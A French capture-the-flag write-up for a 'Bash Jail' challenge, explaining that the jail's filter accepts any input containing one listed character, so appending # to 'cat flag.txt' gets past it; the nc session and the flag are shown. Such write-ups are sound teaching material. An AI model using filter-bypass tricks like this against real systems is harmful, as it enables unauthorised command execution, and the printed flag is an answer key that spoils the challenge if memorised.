Bash Jail

Catégorie: Système Difficulté: - Flag: CTFREI{b45h_j41l5_4r3_4l50_fun!}

Challenge

488B

bashjail.zip

Description

Bienvenue dans ma bash jail !

Essaie d'exéc une commande pour récupérer le flag si t'es chaud :p

Connexion: nc intro.ctfrei.fr 4446

Ce challenge tourne sur un docker et n'est pas disponible

Solution

Dans le script donné, à la ligne 8 la condition est :

if not any([x in code for x in allowed])

Elle signifie littéralement que dans ce que l'on rentre, au moins un seul caractère fasse partie de la liste allowed. La liste étant !#$'()<>\{}, il suffit d'ajouter # à la fin de notre commande pour qu'elle soit acceptée sans être modifiée.

$ nc intro.ctfrei.fr 4446
Bienvenue dans ma bash jail !
Essaie d'exéc une commande pour récupérer le flag si t'es chaud :p
>>> cat flag.txt #
CTFREI{b45h_j41l5_4r3_4l50_fun!}

PrécédentSystème SuivantBash Jail Revenge

Dernière mise à jour il y a 8 mois

Cet article vous a-t-il été utile ?